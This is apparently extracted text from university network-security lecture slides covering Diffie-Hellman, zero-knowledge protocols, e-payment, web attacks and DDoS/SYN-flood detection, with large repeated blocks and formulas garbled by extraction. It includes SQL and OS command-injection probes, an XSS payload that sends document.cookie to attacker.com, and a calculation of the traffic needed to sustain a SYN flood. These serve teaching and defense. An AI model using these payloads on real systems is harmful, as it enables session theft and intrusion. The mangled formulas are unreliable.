Professional Documents
Culture Documents
Network Security Thay Van
Network Security Thay Van
http:\\soict.hust.edu.vn\~vannk
Network Security
Email: vannk@soict.hust.edu.vn
Information Security by Van K Nguyen
Sep 2009 Hanoi University of Technology 2
Agenda
Intermediate
Advanced protocols: special
protocols: ZKP, DSs , Bit
Blind Signatures commitment and
more
◼ Otway-Rees:
❑ Fix the replay attack to Needham-Schroeder’s
◼ Kerberos
◼ DASS
◼ Denning-Sacco
◼ Undeniable signatures
◼ Designated confirmer signatures
◼ Proxy Signatures
◼ Group Signatures
◼ Fail-Stop Digital Signatures
Zero-Knowledge
Blind Signatures Protocols
DIFFIE-HELLMAN KEY
EXCHANGE
Information Security by Van K Nguyen
Sep 2009 Hanoi University of Technology 3
What is Diffie-Hellman?
4
Discrete Logarithms
◼ What is a logarithm?
◼ log10100 = 2 because 102 = 100
◼ In general if logmb = a then ma = b
◼ Where m is called the base of the logarithm
◼ A discrete logarithm can be defined for
integers only
◼ In fact we can define discrete logarithms
mod p also where p is any prime number
5
Discrete Logarithm Problem
6
Sets, Groups and Fields
7
Groups
◼ A group is a set G with a custom-defined binary
operation + such that:
❑ The group is closed under +, i.e., for a, b G:
◼ a+bG
❑ The Associative Law holds i.e., for any a, b, c G:
◼ a + (b + c) = (a + b) + c
❑ There exists an identity element 0, such that
◼ a+0=a
❑ For each a G there exists an inverse element –a
such that
◼ a + (-a) = 0
◼ If for all a, b G: a + b = b + a then the group is
called an Abelian or commutative group
◼ If a group G has a finite number of elements it is
called a finite group
8
More About Group Operations
9
Fields
m 1 2 3 4 5 6 7 8 9 10
2m mod 11 2 4 8 5 10 9 7 3 6 1
m 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
2m mod 19 2 4 8 16 13 7 14 9 18 17 15 11 3 6 12 5 10 1
3m mod 19 3 9 8 5 15 7 2 6 18 16 10 11 14 4 12 17 13 1
12
Primitive Roots
◼ If an = x then a is called the n-th root of x
◼ For any prime number p, if we have a number a
such that powers of a mod p generate all the
numbers between 1 to p-1 then a is called a
Primitive Root of p.
◼ In terms of the Group terminology a is the generator
element of the multiplicative group of the finite field
formed by mod p
◼ Then for any integer b and a primitive root a of prime
number p we can find a unique exponent i such that
b = ai mod p
◼ The exponent i is referred to as the discrete
logarithm or index, of b for the base a.
13
14
15
Diffie-Hellman Algorithm
◼ Five Parts
1. Global Public Elements
2. User A Key Generation
3. User B Key Generation
4. Generation of Secret Key by User A
5. Generation of Secret Key by User B
16
Global Public Elements
◼ q Prime number
◼ < q and is a primitive root
of q
◼ The global public elements are also
sometimes called the domain parameters
17
User A Key Generation
18
User B Key Generation
19
Generation of Secret Key by User A
◼ K = (YB)XA mod q
20
Generation of Secret Key by User B
◼ K = (YA)XB mod q
21
Diffie-Hellman Key Exchange
22
Diffie-Hellman Example
◼ q = 97
◼ =5
◼ XA = 36
◼ XB = 58
◼ YA = 536 = 50 mod 97
◼ YB = 558 = 44 mod 97
◼ K = (YB)XA mod q = 4436 mod 97 = 75 mod 97
◼ K = (YA)XB mod q = 5058 mod 97 = 75 mod 97
23
Why Diffie-Hellman is Secure?
Protocol messages:
A → B: x = r mod n
2
B → A: e from {0, 1}
A → B: y = rse mod n
Fiat-Shamir Identification
Protocol messages:
A → B: x = r mod
If e=0, then the
2 n
response y=r is
independent of secret
B → A: e from {0, 1}
s
A → B: y = rse mod n
Fiat-Shamir Identification
Protocol messages:
A → B: x = r mod n
2
B → A: e from {0, 1}
A → B: y = rse mod n
If e=1, then information pairs (x, y) can
be simulated by choosing y randomly,
and setting x=y2 /v mod n
Bit Commitments and Zero-Knowledge
◼ Peggy the prover would like to show Vic the verifier that
an element b is a member of the subgroup of Z n*
generated by , where has order l. (i.e., does k = b
for some k such that 0 ≤ k ≤ l?)
◼ Peggy chooses a random j, 0 ≤ j ≤ l – 1, and sends Vic
j.
◼ Vic chooses a random i = 0 or 1, and sends it to Peggy.
◼ Peggy computes j + ik mod l, and sends it to Vic.
◼ Vic checks that j + ik = jik = jbi.
◼ They then repeat the above steps log2n times.
◼ If Vic’s final computation checks out in each round, he
accepts the proof.
Complexity Theory
◼ A zero-knowledge proof is
only as good as the secret
it is trying to conceal
◼ Zero-knowledge proofs of
identities in particular are
problematic
◼ The Grandmaster Problem
◼ The Mafia Problem
◼ etc.
Network Security
Van K Nguyen - HUT
◼ In some cases, e.g. for low-cost services, delivery can be made before
the actual payment authorization/transaction
Information Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 6
Off-line vs. On-line
◼ Off-line systems: no current connections from the
customer/merchant to their respective banks
❑ M can’t authorize C with the issuer’s bank
❑ Also, it is difficult to prevent C from spending more money than
actually possesses
➔ most proposed Internet payment systems are online.
◼ Online systems:
❑ Require online presence of an authorization server, which can be a
part of the issuer or the acquirer bank.
❑ requires more communication, but it is more secure than off-line
systems
◼ However, off-line still possible e.g. in some e-cash systems
❑ using some special strong cryptographic tools
◼ Most popular
❑ The first credit cards were introduced decades ago (Diner’s Club
in 1949, American Express in 1958)
◼ Material
❑ For a long time, most are with magnetic stripes containing
unencrypted, read-only information
❑ Now, many are smart cards containing hardware devices (chips)
offering encryption and far greater storage capacity
❑ Recently even virtual credit cards (software electronic wallets),
such as one by Trintech Cable & Wireless
(6) Settlement:
❑ A sends a settlement request to I; I places the money into an interbank settlement
account and charges the amount of sale to C’s credit card account.
(7) Notification
❑ At regular intervals (e.g., monthly) I notifies C of the transactions and their
accumulated charge
❑ C pays the charges by some other means (e.g., direct debit order, bank transfer,
check).
(5b) A has obtained the amount of sale from the interbank settlement
account and credited M’s account
(4) Settlement: The issuer and the acquirer banks arrange transferring
the amount of sale from C’s account to M’s account.
(5) shipping/delivery
◼ On-line
❑ Users do not have possession personally of e-
coins
❑ Trusted third party such as online bank holds
customers’ cash accounts
◼ Off-line
❑ Users can keep e-coins in smartcards or software
wallets
❑ Fraud and double spending require tamper-proof
special techniques
Information Security by Van K Nguyen
Hanoi University of Technology 7
Advantages vs. Disadvantages
◼ Advantages of e-cash
❑ More efficient
❑ Lower transaction costs
❑ Available to anyone, unlike credit cards (which require
special authorization)
◼ Disadvantages
❑ Tax trail non-existent
❑ Money laundering, black mailing
❑ Susceptible to forgery
5. You spend it
◼ Checkfree
❑ Allows payment with online electronic checks
◼ Clickshare
❑ Designed for magazine and newspaper publishers
❑ Miscast as a micropayment only system; only one
of its features
❑ Purchases are billed to a user’s ISP, who in turn
bill the customer
◼ CyberCash
❑ Combines features from cash and checks
❑ Offers credit card, micropayment, and check payment services
❑ Connects merchants directly with credit card processors to provide
authorizations for transactions in real time
◼ No delays in processing prevent insufficient e-cash to pay for the
transaction
◼ CyberCoins
❑ Stored in CyberCash wallet, a software storage mechanism located
on customer’s computer
❑ Used to make purchases between .25c and $10
❑ PayNow -- payments made directly from checking accounts
◼ DigiCash
❑ Trailblazer in e-cash
❑ Allowed customers to purchase goods and services using
anonymous electronic cash
◼ Coin.Net
❑ Electronic tokens stored on a customer’s computer is used to make
purchases
❑ Works by installing special plug-in to a customer’s web browser
❑ Merchants do not need special software to accept eCoins.
❑ eCoin server prevents double-spending and traces transactions, but
consumer is anonymous to merchant
17
Micropayments
◼ Replacement of e-cash ◼ Best suit to small
❑ Cheaper transactions
◼ inexpensive to handle ❑ Beverages
❑ Recycling faster ❑ Phone calls
❑ Easier to count, audit, verify ❑ Tolls, transportation,
◼ Low transactions value, parking
Low cost for transaction ❑ Copying
process ❑ Internet content
❑ e.g. less than $1 ❑ Lotteries, gambling
Broker
◼ Assumptions
❑ User-Broker relationship is long-term
❑ Vendor-Broker relationship is long-term
❑ User-Vendor relationship is short-term
WN W N-1 W N-2 • • • W1 W0
W N-1 = H(W N ) W N-2 = H(W N-1 ) W 1 = H(W 2 ) W 0 = H(W 1 )
NEW COINS
SPENDING OF COINS
CUSTOMER VENDOR
TRANSFER OF INFORMATION
SOURCE: SHERIF
❑ Banking (Citibank)
❑ Auctions (eBay)
❑ Gambling
26
Attacking Authentication
◼ Authentication Technologies
❑ HTML-forms
❑ Multi-factor mechanisms (e.g. passwords and
physical tokens)
❑ Client SSL certificates and smartcards
❑ Windows-integrated authentication
❑ Kerberos
❑ Authentication services
34
Session Management
◼ “Static Tokens”
❑ Same token reissued to user every time
◼ A poorly implemented “remember me” feature
◼ Hacking steps:
❑ Supply unexpected syntax to cause problems
❑ Identify any anomalies in the application response
❑ Examine any error messages
❑ Systematically modify input that causes
anomalous behavior to form and verify
hypotheses on the behavior of the system
❑ Try safe commands to prove existence of injection
flaw
❑ Exploit the flaw
Code Injection Into SQL
◼ Gain knowledge of SQL
❑ Install same database as used by application on local server to test SQL
commands
❑ Consult manuals on error messages
◼ Detection:
❑ Cause an error condition:
◼ String Data
❑ Submit a single quotation mark
❑ Submit two single quotation marks
❑ Use SQL concatenation characters
▪ ‘ | | ‘ FOO (oracle)
▪ ‘ + ‘ FOO (MS-SQL)
▪ ‘ ‘ FOO (No space between quotation marks) (MySQL)
◼ Numeric Data
❑ Replace numeric value with arithmetic (Instead of 5, submit 2+3)
❑ Use sql-specific keywords
▪ 67-ASCII(‘A’) is equivalent to 2 in SQL
❑ Beware of special meaning of characters in http such as ‘&’, ‘=‘, …
Detection
◼ Cause an error condition:
❑ Select / Insert Statements
◼ Entry point is usually ‘where’ clause, but ‘order by’ etc.
might also be injected
◼ Example: admin’ or 1==1
❑ Example injections into user name field for injection
into insert, where we do not know the number of
parameters:
◼ foo ’)--
◼ foo ‘ , 1) –
◼ foo ‘ , 1 , 1) –
◼ foo ‘ , 1 , 1 , 1) –
❑ Here we rely on 1 being cast into a string.
Union operator
◼ Usual:
SELECT author, title, year FROM books WHERE publisher = ‘Wiley’
◼ Inject
‘ group by users.ID having 1=1 –
❑ Generates error message
◼ Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’ (Microsoft)
[ODBC SQL Server Driver] [SQL Server] Column ‘users.username’ is invalid
in the select list because it is not contained in an aggregate function and there
is no GROUP BY clause
MS-SQL: Exploiting ODBC Error
Messages
◼ Inject
◼ ‘ group by users.ID, users.username, users.password,
users.privs having 1=1 --
❑ Generates no error message
❑ No proceed injecting union statements to find data
types for each column
❑ Inject
◼ ‘ union select sum(username) from users--’
By-passing filters
◼ Two types:
❑ Characters ; | & newline are used to batch
multiple commands
❑ Backtick character ` used to encapsulate
speparate commands within a data item
◼ Use time delay errors
❑ Use ‘ping’ to the loop-back device
◼ | | ping -I 30 127.0.0.1 ; x | | ping -n 30 127.0.0.1 &
❑ works for both windows and linux in the absence
of filtering
OS Injection
◼ Dynamic execution in php
❑ uses eval
◼ Dynamic execution in asp
❑ uses evaluate
◼ Hacking steps to find injection attack:
❑ Try
◼ ;echo%2011111111
◼ echo%201111111
◼ response.write%201111111
◼ :response.write%201111111
❑ Look for a return of 1111111 or an error message
OS Injection
◼ Soap Injection
◼ XPath injection
◼ SMTP injection
◼ LDAP injection
Attacking other users: XSS
◼ XSS attacks
❑ Vulnerability has wide range of consequences,
from pretty harmless to complete loss of
ownership of a website
ATTACKING OTHER USERS:
CROSS-SITE SCRIPTING (XSS)
Server
User logs
responds
in with
User requests attacker’s
attacker’s Javascript
URL
User’s browser
Attacker feeds sends
craftedsession
URL
token to attacker
Reflected XSS
◼ Exploit:
1. User logs on as normal and obtains a session cookie
2. Attacker feeds a URL to the user
◼ https://bobadilla.engr.scu.edu/error.php?message=<script>var+i=n
ew+Image;+i.src=“http://attacker.com/”%2bddocument.cookie;</scr
ipt>
3. The user requests from the application the URL fed to them by
the attacker
4. The server responds to the user’s request; the answer contains
the javascript
5. User browser receives and executes the javascript
◼ var I = new Image; i.src=http://attacker.com/+document.cookie
6. Code causes the user’s browser to make a request to
attacker.com which contains the current session token
7. Attacker monitors requests to attacker.com and captures the
token in order to be able to perform arbitrary actions as the
user
Reflected XSS
❑ Banking (Citibank)
❑ Auctions (eBay)
❑ Gambling
24
Attacking Authentication
◼ Authentication Technologies
❑ HTML-forms
❑ Multi-factor mechanisms (e.g. passwords and
physical tokens)
❑ Client SSL certificates and smartcards
❑ Windows-integrated authentication
❑ Kerberos
❑ Authentication services
32
Session Management
◼ “Static Tokens”
❑ Same token reissued to user every time
◼ A poorly implemented “remember me” feature
◼ Hacking steps:
❑ Supply unexpected syntax to cause problems
❑ Identify any anomalies in the application response
❑ Examine any error messages
❑ Systematically modify input that causes
anomalous behavior to form and verify
hypotheses on the behavior of the system
❑ Try safe commands to prove existence of injection
flaw
❑ Exploit the flaw
Code Injection Into SQL
◼ Gain knowledge of SQL
❑ Install same database as used by application on local server to test SQL
commands
❑ Consult manuals on error messages
◼ Detection:
❑ Cause an error condition:
◼ String Data
❑ Submit a single quotation mark
❑ Submit two single quotation marks
❑ Use SQL concatenation characters
▪ ‘ | | ‘ FOO (oracle)
▪ ‘ + ‘ FOO (MS-SQL)
▪ ‘ ‘ FOO (No space between quotation marks) (MySQL)
◼ Numeric Data
❑ Replace numeric value with arithmetic (Instead of 5, submit 2+3)
❑ Use sql-specific keywords
▪ 67-ASCII(‘A’) is equivalent to 2 in SQL
❑ Beware of special meaning of characters in http such as ‘&’, ‘=‘, …
Detection
◼ Cause an error condition:
❑ Select / Insert Statements
◼ Entry point is usually ‘where’ clause, but ‘order by’ etc.
might also be injected
◼ Example: admin’ or 1==1
❑ Example injections into user name field for injection
into insert, where we do not know the number of
parameters:
◼ foo ’)--
◼ foo ‘ , 1) –
◼ foo ‘ , 1 , 1) –
◼ foo ‘ , 1 , 1 , 1) –
❑ Here we rely on 1 being cast into a string.
Union operator
◼ Usual:
SELECT author, title, year FROM books WHERE publisher = ‘Wiley’
◼ Inject
‘ group by users.ID having 1=1 –
❑ Generates error message
◼ Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’ (Microsoft)
[ODBC SQL Server Driver] [SQL Server] Column ‘users.username’ is invalid
in the select list because it is not contained in an aggregate function and there
is no GROUP BY clause
MS-SQL: Exploiting ODBC Error
Messages
◼ Inject
◼ ‘ group by users.ID, users.username, users.password,
users.privs having 1=1 --
❑ Generates no error message
❑ No proceed injecting union statements to find data
types for each column
❑ Inject
◼ ‘ union select sum(username) from users--’
By-passing filters
◼ Two types:
❑ Characters ; | & newline are used to batch
multiple commands
❑ Backtick character ` used to encapsulate
speparate commands within a data item
◼ Use time delay errors
❑ Use ‘ping’ to the loop-back device
◼ | | ping -I 30 127.0.0.1 ; x | | ping -n 30 127.0.0.1 &
❑ works for both windows and linux in the absence
of filtering
OS Injection
◼ Dynamic execution in php
❑ uses eval
◼ Dynamic execution in asp
❑ uses evaluate
◼ Hacking steps to find injection attack:
❑ Try
◼ ;echo%2011111111
◼ echo%201111111
◼ response.write%201111111
◼ :response.write%201111111
❑ Look for a return of 1111111 or an error message
OS Injection
◼ Soap Injection
◼ XPath injection
◼ SMTP injection
◼ LDAP injection
Attacking other users: XSS
◼ XSS attacks
❑ Vulnerability has wide range of consequences,
from pretty harmless to complete loss of
ownership of a website
ATTACKING OTHER USERS:
CROSS-SITE SCRIPTING (XSS)
Server
User logs
responds
in with
User requests attacker’s
attacker’s Javascript
URL
User’s browser
Attacker feeds sends
craftedsession
URL
token to attacker
Reflected XSS
◼ Exploit:
1. User logs on as normal and obtains a session cookie
2. Attacker feeds a URL to the user
◼ https://bobadilla.engr.scu.edu/error.php?message=<script>var+i=n
ew+Image;+i.src=“http://attacker.com/”%2bddocument.cookie;</scr
ipt>
3. The user requests from the application the URL fed to them by
the attacker
4. The server responds to the user’s request; the answer contains
the javascript
5. User browser receives and executes the javascript
◼ var I = new Image; i.src=http://attacker.com/+document.cookie
6. Code causes the user’s browser to make a request to
attacker.com which contains the current session token
7. Attacker monitors requests to attacker.com and captures the
token in order to be able to perform arbitrary actions as the
user
Reflected XSS
Sep 2009
2
Denial-Of-Service
◼ Flooding-based
◼ Send packets to victims
❑ Network resources
❑ System resources
◼ Traditional DOS
❑ One attacker
◼ Distributed DOS
❑ Countless attackers
DDoS
4
Attacks Reported
◼ May/June, 1998
❑ First primitive DDoS tools developed in the
underground:
◼ Small networks, only mildly worse than coordinated point-
to-point DoS attacks.
◼ August 17, 1999
❑ Attack on the University of Minnesota reported to
UW network operations and security teams.
◼ February 2000
❑ Attack on Yahoo, eBay, Amazon.com and other
popular websites.
◼ Once, more than 12,000 attacks during a
three week period.
Reference: http://staff.washington.edu/dittrich/misc/ddos/timeline.html
5
DDoS Attacks
6
Direct Attacks
◼ Examples:
❑ TCP-SYN Flooding: The last message of TCP’s 3 way
handshake never arrives from source.
❑ Congesting a victim using ICMP messages, RST packets
or UDP packets.
❑ Attack packet onserved: TCP packets (94%), UDP
packets (2%) and ICMP packets(2%).
7
Direct Attack
Figure 1.
8
Reflector Attacks
◼ Examples:
❑ Smurf Attacks: Attacker sends ICMP echo request to a
subnet directed broadcast address with the victim’s address
as the source address.
❑ SYN-ACK flooding: Reflectors respond with SYN-ACK
packets to victim’s address.
9
Reflector Attack
Figure 1.
10
DDoS Attack Architectures
11
Some Reflector Attack Methods
12
Solutions to the DDoS Problems
◼ Inadequate, anyway.
14
Attack Source Traceback and Identification
15
Attack Detection and Filtering
◼ Effectiveness of Detection
❑ FPR (False Positive Ratio):
No. of false positives/Total number of confirmed normal
packets
❑ FNR (False Negative Ratio):
No. of false negatives/Total number of confirmed attack
packets
16
Attack Detection and Filtering
◼ Effectiveness of Filtering
17
Attack Detection and Filtering
18
Attack Detection and Filtering
◼ At Source Networks:
❑ One can filter packets based on address spoofing
❑ Direct attacks can be traced easily, difficult reflector attacks
❑ Ensure all ISPs have ingress packet filtering
◼ Filter the spoofed address packets which’s source IPs do not belong to the
source network
◼ Very difficult to deploy this for all ISP (Impossible?)
19
Attack Detection and Filtering
20
An Internet Firewall
21
Route-Based Packet Filtering (RPF)
◼ Extends the idea of ingress packet filtering
❑ Using distributed packet filters to examine the
packets, based on addresses and BGP routing
information.
◼ A packet is considered an attack packet if it comes from an
unexpected link.
◼ Major Drawbacks
❑ BGP messages to carry the needed source addresses
➔ Overhead!
❑ Deployment is extremely demanding
◼ Once thought: Filters were to be placed in 1800 out of 10,000 ASs
◼ # ASs is continuously increasing.
❑ Can’t work against reflected packets.
22
Distributed Attack Detection (DAD)
◼ The idea is to deploys multiple Distributed Detection
Systems (DSs) to observe network anomalies and
misuses.
❑ Anomaly detection: Identifying traffic patterns that
significantly deviate from normal
◼ e.g., unusual traffic intensity for specific packet types.
❑ Misuse detection: Identifying traffic that matches a known
attack signature.
◼ DSs to exchange attack information from local
observations
❑ Statefull in respect to the DDoS attacks.
◼ Still a challenging to ask for an effective and
deployable architecture
23
Distributed Attack Detection
DS Design Considerations
Other considerations:
• Filters should be installed only on attack
interfaces on ‘CONFIRMED’ state
• All DSs should be connected ‘always’
• Works in Progress:
Intrusion Detection Exchange Protocol
Tw o Hypotheses:
Intrusion Detection Message Exchange
H1 – Presence of a DDoS attack
Format
Each attack alert includes a
H0 – Null Hypothesis
‘confidence level’
24
SYN FLOOD DEFENSE
SOLUTIONS
25
TCP SYN-Flooding Attack
◼ pipelined: ◼ connection-oriented:
❑ TCP congestion and flow ❑ handshaking (exchange
control set window size of control msgs) init’s
sender, receiver state
◼ send & receive buffers before data exchange
◼ flow controlled:
❑ sender will not
socket
application
writes data
application
reads data
overwhelm receiver
socket
door door
TCP TCP
send buffer receive buffer
segment
TCP segment structure
32 bits
URG: urgent data counting
(generally not used) source port # dest port #
by bytes
sequence number of data
ACK: ACK #
valid acknowledgement number (not segments!)
head not
PSH: push data now len used
UA P R S F Receive window
(generally not used) # bytes
checksum Urg data pnter
rcvr willing
RST, SYN, FIN: to accept
Options (variable length)
connection estab
(setup, teardown
commands)
application
Internet data
checksum (variable length)
(as in UDP)
Attack Mechanism
◼ attacker sends a
flood of SYNs ➔ too
manyTCB ➔ host is
exhauted in memory.
◼ To avoid this, OS only
allows a fixed
maximum number of
TCBs in SYN-
RECEIVED
◼ If this threshold is
reached, new coming
SYN will be rejected
TCP Connection Management
Three way handshake:
Recall: TCP sender, receiver
Step 1: client host sends TCP
establish “connection”
SYN segment to server
before exchanging data
❑ specifies initial seq #
segments
◼ initialize TCP variables: ❑ no data
C S
SYNC1 Listening
SYNC2
Store data
SYNC3
SYNC4
SYNC5
Implementation Method
How to create a successful flood
◼ Making drops of incomplete connection (IC)
❑ Standard TCP: a connection times out only after some retranmisstion ➔ 511 sec
❑ Assuming 1024 ICs are allowed per socket➔ 2 connection attempts per second to
exhaust all allocated resources.
❑ Note that existing ICs are dropped when a new SYN request is received.
◼ If an ACK arrives at the server but does not find a corresponding
IC state ➔ the server fail to establish such required connection
❑ Round trip time (RTT): time required for the server to have the client reply
❑ Forcing the server to drop IC state at a rate larger than the RTT, ➔ no
connections are able to complete ➔ success in attack!
◼ The goal of attack is to recycle every connection before the average
RTT
❑ For a listen queue size of 1024, and a 100 millisecond RTT ➔ need 10,000 packets
per second.
❑ A minimal size TCP packet is 64 bytes, so the total bandwidth used is only
4Mb/second ➔ practical!
RED – SYN
BLUE- FIN
BLACK – RST
Statistical Attack Detection
during an attack
False Positive Possibilities
◼ Trình bày thuật toán với một ví dụ minh họa với q=23.
SFD-BF
Idea
Input : x
• Output : H[x]
• Properties
– Each value of x maps to a value of H[x]
– Typically: Size of (x) >> Size of (H[x])
• Implementation
– Hash Function
XOR of bits, Shifting, rotates ..
Operating System
Concepts
Bloom-Filter (BF)
Operating System
Concepts
Bloom-Filter (BF)
Operating System
Concepts
Querying a Bloom Filter
Operating System
Concepts
Querying a Bloom Filter
Operating System
Concepts
Optimal Parameters of a Bloom filter
Operating System
Concepts
Counting Bloom Filters
Operating System
Concepts
Counting Bloom Filters
Operating System
Concepts
SFD-Method
1- Classification of packets
2-Computing the # of SYN and FIN packets
going through
3-Using algorithm CUSUM to analyze the (SYN-
FIN) pair behaviour
Operating System
Concepts
SFD-BF Method
Operating System
Concepts
Method
Sep 2009
2
Denial-Of-Service
◼ Flooding-based
◼ Send packets to victims
❑ Network resources
❑ System resources
◼ Traditional DOS
❑ One attacker
◼ Distributed DOS
❑ Countless attackers
DDoS
4
Attacks Reported
◼ May/June, 1998
❑ First primitive DDoS tools developed in the
underground:
◼ Small networks, only mildly worse than coordinated point-
to-point DoS attacks.
◼ August 17, 1999
❑ Attack on the University of Minnesota reported to
UW network operations and security teams.
◼ February 2000
❑ Attack on Yahoo, eBay, Amazon.com and other
popular websites.
◼ Once, more than 12,000 attacks during a
three week period.
Reference: http://staff.washington.edu/dittrich/misc/ddos/timeline.html
5
DDoS Attacks
6
Direct Attacks
◼ Examples:
❑ TCP-SYN Flooding: The last message of TCP’s 3 way
handshake never arrives from source.
❑ Congesting a victim using ICMP messages, RST packets
or UDP packets.
❑ Attack packet onserved: TCP packets (94%), UDP
packets (2%) and ICMP packets(2%).
7
Direct Attack
Figure 1.
8
Reflector Attacks
◼ Examples:
❑ Smurf Attacks: Attacker sends ICMP echo request to a
subnet directed broadcast address with the victim’s address
as the source address.
❑ SYN-ACK flooding: Reflectors respond with SYN-ACK
packets to victim’s address.
9
Reflector Attack
Figure 1.
10
DDoS Attack Architectures
11
Some Reflector Attack Methods
12
Solutions to the DDoS Problems
◼ Inadequate, anyway.
14
Attack Source Traceback and Identification
15
Attack Detection and Filtering
◼ Effectiveness of Detection
❑ FPR (False Positive Ratio):
No. of false positives/Total number of confirmed normal
packets
❑ FNR (False Negative Ratio):
No. of false negatives/Total number of confirmed attack
packets
16
Attack Detection and Filtering
◼ Effectiveness of Filtering
17
Attack Detection and Filtering
18
Attack Detection and Filtering
◼ At Source Networks:
❑ One can filter packets based on address spoofing
❑ Direct attacks can be traced easily, difficult reflector attacks
❑ Ensure all ISPs have ingress packet filtering
◼ Filter the spoofed address packets which’s source IPs do not belong to the
source network
◼ Very difficult to deploy this for all ISP (Impossible?)
19
Attack Detection and Filtering
20
An Internet Firewall
21
Route-Based Packet Filtering (RPF)
◼ Extends the idea of ingress packet filtering
❑ Using distributed packet filters to examine the
packets, based on addresses and BGP routing
information.
◼ A packet is considered an attack packet if it comes from an
unexpected link.
◼ Major Drawbacks
❑ BGP messages to carry the needed source addresses
➔ Overhead!
❑ Deployment is extremely demanding
◼ Once thought: Filters were to be placed in 1800 out of 10,000 ASs
◼ # ASs is continuously increasing.
❑ Can’t work against reflected packets.
22
Distributed Attack Detection (DAD)
◼ The idea is to deploys multiple Distributed Detection
Systems (DSs) to observe network anomalies and
misuses.
❑ Anomaly detection: Identifying traffic patterns that
significantly deviate from normal
◼ e.g., unusual traffic intensity for specific packet types.
❑ Misuse detection: Identifying traffic that matches a known
attack signature.
◼ DSs to exchange attack information from local
observations
❑ Statefull in respect to the DDoS attacks.
◼ Still a challenging to ask for an effective and
deployable architecture
23
Distributed Attack Detection
DS Design Considerations
Other considerations:
• Filters should be installed only on attack
interfaces on ‘CONFIRMED’ state
• All DSs should be connected ‘always’
• Works in Progress:
Intrusion Detection Exchange Protocol
Tw o Hypotheses:
Intrusion Detection Message Exchange
H1 – Presence of a DDoS attack
Format
Each attack alert includes a
H0 – Null Hypothesis
‘confidence level’
24
SYN FLOOD DEFENSE
SOLUTIONS
25
TCP SYN-Flooding Attack
◼ pipelined: ◼ connection-oriented:
❑ TCP congestion and flow ❑ handshaking (exchange
control set window size of control msgs) init’s
sender, receiver state
◼ send & receive buffers before data exchange
◼ flow controlled:
❑ sender will not
socket
application
writes data
application
reads data
overwhelm receiver
socket
door door
TCP TCP
send buffer receive buffer
segment
TCP segment structure
32 bits
URG: urgent data counting
(generally not used) source port # dest port #
by bytes
sequence number of data
ACK: ACK #
valid acknowledgement number (not segments!)
head not
PSH: push data now len used
UA P R S F Receive window
(generally not used) # bytes
checksum Urg data pnter
rcvr willing
RST, SYN, FIN: to accept
Options (variable length)
connection estab
(setup, teardown
commands)
application
Internet data
checksum (variable length)
(as in UDP)
Attack Mechanism
◼ attacker sends a
flood of SYNs ➔ too
manyTCB ➔ host is
exhauted in memory.
◼ To avoid this, OS only
allows a fixed
maximum number of
TCBs in SYN-
RECEIVED
◼ If this threshold is
reached, new coming
SYN will be rejected
TCP Connection Management
Three way handshake:
Recall: TCP sender, receiver
Step 1: client host sends TCP
establish “connection”
SYN segment to server
before exchanging data
❑ specifies initial seq #
segments
◼ initialize TCP variables: ❑ no data
C S
SYNC1 Listening
SYNC2
Store data
SYNC3
SYNC4
SYNC5
Implementation Method
How to create a successful flood
◼ Making drops of incomplete connection (IC)
❑ Standard TCP: a connection times out only after some retranmission ➔ 511 sec
❑ Assuming 1024 ICs are allowed per socket➔ 2 connection attempts per second to
exhaust all allocated resources.
❑ Note that existing ICs are dropped when a new SYN request is received.
◼ If an ACK arrives at the server but does not find a corresponding
IC state ➔ the server fail to establish such required connection
❑ Round trip time (RTT): time required for the server to have the client reply
❑ Forcing the server to drop IC state at a rate larger than the RTT, ➔ no
connections are able to complete ➔ success in attack!
◼ The goal of attack is to recycle every connection before the average
RTT
❑ For a listen queue size of 1024, and a 100 millisecond RTT ➔ need 10,000 packets
per second.
❑ A minimal size TCP packet is 64 bytes, so the total bandwidth used is only
4Mb/second ➔ practical!
RED – SYN
BLUE- FIN
BLACK – RST
Statistical Attack Detection
during an attack
False Positive Possibilities
SFD-BF
Idea
Input : x
• Output : H[x]
• Properties
– Each value of x maps to a value of H[x]
– Typically: Size of (x) >> Size of (H[x])
• Implementation
– Hash Function
XOR of bits, Shifting, rotates ..
Operating System
Concepts
Bloom-Filter (BF)
Operating System
Concepts
Bloom-Filter (BF)
Operating System
Concepts
Querying a Bloom Filter
Operating System
Concepts
Querying a Bloom Filter
Operating System
Concepts
Optimal Parameters of a Bloom filter
Operating System
Concepts
Counting Bloom Filters
Operating System
Concepts
Counting Bloom Filters
Operating System
Concepts
SFD-Method
1- Classification of packets
2-Computing the # of SYN and FIN packets
going through
3-Using algorithm CUSUM to analyze the (SYN-
FIN) pair behaviour
Operating System
Concepts
SFD-BF Method
Operating System
Concepts
Method